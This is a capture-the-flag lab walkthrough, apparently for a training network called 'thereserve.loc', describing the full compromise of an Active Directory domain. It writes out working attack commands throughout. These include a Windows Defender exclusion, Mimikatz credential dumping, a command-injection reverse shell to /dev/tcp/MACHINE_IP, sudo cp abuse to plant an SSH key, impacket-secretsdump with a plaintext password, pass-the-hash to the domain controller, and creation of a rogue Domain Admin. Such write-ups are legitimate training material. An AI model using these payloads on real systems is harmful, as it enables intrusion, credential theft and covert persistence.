Full Compromise of CORP Domain

Recon

We now have local administrator access on the machine, but to fully compromise the Active Directory, we'll need a Domain Administrator account.

Since Windows Defender is active, we need a way to whitelist our malicious files. To keep the challenge level high for other players on the network, instead of turning off Windows Defender, we can add an exclusion folder using the following command:

Set-MpPreference -ExclusionPath "C:\Users\laura.wood\Downloads*"

After setting up the exclusion folder, we copied a few tools to begin Active Directory Enumeration and Exploitation. We started by running Mimikatz to dump hashes, secrets, and extract data from lsass.

Next, we ran SharpHound to gather data to map the Active Directory in Bloodhound. To exfiltrate the collected data from the machine, we created a shared folder pointing to the Downloads directory using the following command:

New-SMBShare -name "free$" -path "C:\Users\laura.wood\Downloads" -FullAccess "laura.wood@corp.thereserve.loc"

Finally, we can use smbclient to access the shared folder and retrieve the data collected by our tools:

After importing the data into the Bloodhound database, we can run a series of queries to identify the most effective attack paths.

We begin by searching for Kerberoastable accounts to see if any accounts are vulnerable to Kerberos ticket-granting service attacks. We can use the cypher in Bloodhound CE.

The following command will give all kerberoastable accounts:

MATCH (n:User)WHERE n.hasspn=true
RETURN n

A Kerberoasting attack targets the password hash of an Active Directory account that has a Service Principal Name (SPN). This method involves using an authenticated domain user to request a Kerberos service ticket from the Ticket Granting Service (TGS).

The returned ticket is encrypted with the service account’s hash, which can then be cracked using tools like hashcat after capturing the TGS ticket.

A key benefit of this attack is that it doesn’t require privileged access—any domain user can request service tickets from the TGS, making it an effective way to attempt password recovery.

Using Rubeus provided in resources we can perform kerberoasting.

After capturing the hashes, we utilize hashcat to crack them. After some time, we successfully retrieve the password for the svcScanning account.

Breaching vpn.thereserve.loc (10.200.XXX.12)

Next, we start a listener via netcat on 1337.

nc -lnvp 1337

And prepare the following payload to connect back to our machine.

x && /bin/bash -i >& /dev/tcp/MACHINE_IP/1337 0>&1

We have a reverse shell. Let's upgrade it for better functionality.

Upgrade Simple Shells to Fully Interactive TTYs

Privilege Escalation and Persistence

Enumeration of the target reveals that the user www-data has permission to use cp with sudo.

www-data@ip-10-200-118-12:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ip-10-200-118-12:/var/www/html$ sudo -l
Matching Defaults entries for www-data on ip-10-200-118-12:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-200-118-12:
    (root) NOPASSWD: /home/ubuntu/openvpn-createuser.sh, /bin/cp
www-data@ip-10-200-118-12:/var/www/html$ 

The next step is to check GTFOBins to see if we can exploit this sudo permission for cp.

cp | GTFOBins

With the following command, we are able to write to any file:

LFILE=file_to_write
echo "DATA" | sudo cp /dev/stdin "$LFILE"

Next, we search for any existing users on the machine and find a user named ubuntu.

www-data@ip-10-200-118-12:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
www-data@ip-10-200-118-12:/home$ 

Looking at the home directory of Ubuntu, we are able to read it and there is a .ssh folder.

www-data@ip-10-200-118-12:/home$ ls -lah ubuntu/ 
total 168K
drwxr-xr-x 10 ubuntu ubuntu 4.0K Nov 12 10:40 .
drwxr-xr-x  3 root   root   4.0K Jul  8  2020 ..
-rw-------  1 root   root    547 Apr 11  2023 .bash_history
-rw-r--r--  1 ubuntu ubuntu  220 Apr  4  2018 .bash_logout
-rw-r--r--  1 ubuntu ubuntu 3.7K Apr  4  2018 .bashrc
drwx------  2 ubuntu ubuntu 4.0K Jul  8  2020 .cache
drwx------  3 root   root   4.0K Jul  8  2020 .config
drwx------  3 ubuntu ubuntu 4.0K Jul  8  2020 .gnupg
drwxrwxr-x  3 ubuntu ubuntu 4.0K Jul  8  2020 .local
-rw-------  1 ubuntu ubuntu  302 Apr  8  2023 .mysql_history
-rw-r--r--  1 ubuntu ubuntu  807 Apr  4  2018 .profile
-rw-r--r--  1 root   root     74 Feb 15  2023 .selected_editor
drwx------  2 ubuntu ubuntu 4.0K Apr 27  2023 .ssh
-rw-r--r--  1 ubuntu ubuntu    0 Jul  8  2020 .sudo_as_admin_successful
-rw-------  1 ubuntu ubuntu  11K May  4  2023 .viminfo
-rw-------  1 ubuntu ubuntu  16K Apr 27  2023 .viminfo.tmp
-rw-r--r--  1 root   root    165 Jul  8  2020 .wget-hsts
drwxrwxr-x  3 ubuntu ubuntu 4.0K Feb 15  2023 Throwback-Time
drwxrwxr-x  2 ubuntu ubuntu 4.0K Nov 13 11:08 japan121
-rwxrwxr-x  1 ubuntu ubuntu 1.1K Jul  8  2020 openvpn-createuser.sh
-rwxrwxr-x  1 ubuntu ubuntu 1.1K Mar 18  2023 openvpn-createuser.sh.bak
-rwxrwxr-x  1 ubuntu ubuntu  816 Jul  8  2020 openvpn-deleteuser.sh
-rwxrwxr-x  1 ubuntu ubuntu  14K Jul  8  2020 openvpn-installer.sh
-rw-r--r--  1 root   root    637 Apr 21  2023 server.conf.bak
drwxrwxr-x  2 ubuntu ubuntu 4.0K Nov 10 05:58 teady
-rw-rw-r--  1 ubuntu ubuntu  34K Feb 15  2023 thereserve.png
-rwxrwxr-x  1 ubuntu ubuntu 1.7K May  4  2023 vpn-fix.py
www-data@ip-10-200-118-12:/home$

The plan is to add our own public SSH key to the .ssh/authorized_keys file for the ubuntu user, allowing us to SSH into the account directly.

This is our key:

Before proceeding, we retrieve the existing keys of other participants and users from the authorized_keys file. This allows us to append our key without disrupting the persistence of other users on the network and to remain undetected. Additionally, this ensures that the user ubuntu can still SSH into the machine as usual.

Before making any modifications, we should check if the authorized_keys file exists and examine its current content to avoid accidental overwrites.

sudo cp /home/ubuntu/.ssh/authorized_keys /dev/stdout

Note: Append your key. DO NOT overwrite the existing keys.

You can break the vpn machine and will require a full network reset.

Append our SSH public key to .ssh/authorized_keys.

LFILE=/home/ubuntu/.ssh/authorized_keys
echo "ssh-rsa
-----------------
Existing keys
-----------------
ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABgQC7nLsm+plDjHmoVTy3T99CuEGlCX/qpejMDw9NNgMT0HgLZYXj3RMH44bl5pviH+4Zzp/CNc7etMNbMh9cAxbMH9JmxLf6K8bzCbuL2FDUct65oQFFnvCEJKQOnx5Lcg6gxuxz66ejd7KwxbMhkAku6kha4PU5CJNy+zGRoy+4PyUgfnZceNw9rwU5kpc71+BSVjwx0uHa87vbz7roVikrPrAXKpZwRUWefXHQfEyVW5OdIVf3smedVbdx0x30XyO2tuKQbf54KZPLjXyn5yi+6a7bIt15D78owtJxAPsauKh4FJzHXtumWgJcN/ama+zuSJcj6kPSNW7adhvssEChIUa5PtqsXC1IR4vbupT3WelP9keng62od5QA7VhwG960b54CNEDaabSqkzK0Vv4Yx9TfsjDOblIVFUWYEZ2R6MDGmOykilgCRT4Yv+mz+3WsfF9cp7WJUYp81q5DXVF/V0bOasqsnQ4bOjB10QOFjpSu6jHH/YSzYrQUZuoNPNc= kali@kali" | sudo cp /dev/stdin "$LFILE"

After successfully adding our SSH key to the authorized_keys file, we can now SSH into the machine as the ubuntu user.

Enumeration of the target reveals that the ubuntu user is allowed to run any command without providing a password using sudo.

ubuntu@ip-10-200-118-12:~$ sudo -l
Matching Defaults entries for ubuntu on ip-10-200-118-12:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ubuntu may run the following commands on ip-10-200-118-12:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
ubuntu@ip-10-200-118-12:~$ 

Lateral Movement

To pivot through the network using SSH dynamic port forwarding, we can use the following command to redirect traffic through port 9050:

ssh -D 9050 -i rtc ubuntu@10.200.118.12

This command sets up a SOCKS proxy on port 9050 using SSH, allowing us to route traffic through the target machine. The -D 9050 option creates the dynamic port forward, and the -i rtc option specifies the private key for authentication.

To continue our investigation and move closer to fully compromising the corporate domain, we use sshuttle to pivot through the network. This allows us to avoid relying on ProxyChains, simplifying the process for further network exploration and exploitation.

To verify that our network pivoting with sshuttle is working correctly, we use Nmap to scan a known port on a known machine within the target network.

This helps ensure that we have successfully established connectivity and can continue with further enumeration and exploitation from our current position.

We are now able to log in using Remmina with the svcScanning credentials, granting us further access to the target environment for continued enumeration and potential exploitation.

Upon examining the user groups, we discover that the svcScanning account is a member of the Local Administrators group. This grants us elevated privileges on the machine, allowing for deeper access and potential control over the system.

Flags 5 - 6

NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:

• Flag 5: Foothold on Corporate Division Tier 1 Infrastructure

• Flag 6: Administrative access to Corporate Division Tier 1 Infrastructure

Breaching CORPDC (10.200.XXX.102)

Running impackets-secretsdumps with the user svcScanning in the hope to get any credentials of svcBackups or another high value target.

impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.XXX.31

We proceed by running impacket-secretsdump with the svcScanning credentials. The goal is to extract any valuable credentials, particularly targeting svcBackups or other high-value accounts that might provide further access or lead to a Domain Administrator account.

We get svcBackups credentials with dcsync capabilities.

With this user we run again impacket-secretsdump and are able to retrieve the local Administrator hash.

By leveraging the Pass-the-Hash (PTH) technique with the local Administrator hash, we use Evil-WinRM to directly connect to the child domain controller, corpdc.

This allows us to gain access to the domain controller and potentially perform further actions to escalate privileges or compromise the domain.

Running the following commands to add our own user and adding it to the Domain Admins:

New-ADUser <username>
Add-ADGroupMember -Identity 'Domain Admins' -Members <username>
Set-ADAccountPassword -Identity <username>-NewPassword (ConvertTo-SecureString -AsPlainText "<Password>" -Force)
Enable-ADAccount -Identity '<username>'

Flags 7 - 8

NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:

• Flag 7: Foothold on Corporate Division Tier 0 Infrastructure

• Flag 8: Administrative access to Corporate Division Tier 0 Infrastructure